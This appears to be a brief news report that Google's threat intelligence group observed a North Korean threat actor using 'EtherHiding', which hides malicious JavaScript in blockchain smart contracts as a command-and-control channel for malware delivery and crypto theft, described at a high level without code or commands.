North Korean Hackers Use EtherHiding to Steal Crypto
Google reveals North Korean hackers are using EtherHiding, a blockchain-based technique, to deliver malware and steal cryptocurrency.
A North Korean threat actor has been found using a blockchain-based technique, known as ‘EtherHiding,’ to deliver malware to facilitate cryptocurrency theft.
EtherHiding is a technique where attackers embed malicious code, such as JavaScript payloads, inside a blockchain-based smart contract, effectively using the decentralized ledger as a resilient command-and-control (C2) server.
This is the first time Google Threat Intelligence Group (GTIG) has observed a nation-state actor adopting this method, it said in its blog published on October 16.
The use of EtherHiding is resilient against conventional takedown and blocklisting efforts, GTIG explained.
The threat intelligence group has tracked threat actor UNC5342 since February 2026, incorporating EtherHiding into an ongoing social engineering campaign.
Author's summary: North Korean hackers use EtherHiding technique.
More News
- Dan's Daily: Jagr Back; Team USA Makes Demands; Penguins Changes
- Knox County grand jury indictments: Manslaughter, arson, aggravated assault
- Laois cue star triumphs at IEPF World 8-Ball Masters Over-50 Championship
- Texas faces heightened wildfire threat amid ongoing drought
- It's official - Pennsylvania, New Jersey and Delaware among states that must switch to daylight saving time - these are the ones that must not
- Chelsea enjoy thumping win at Forest - West London Sport
- The Origins of John Singleton's Snowfall Empire
- First Alert Forecast: Dry, warm Saturday ahead of rainy Sunday morning
- BIG: Developer Successfully Ports NothingOS 4.0 to the Phone 1
- Report: Ireland Stalwart Considering Shock Move To Breakway League | Balls.ie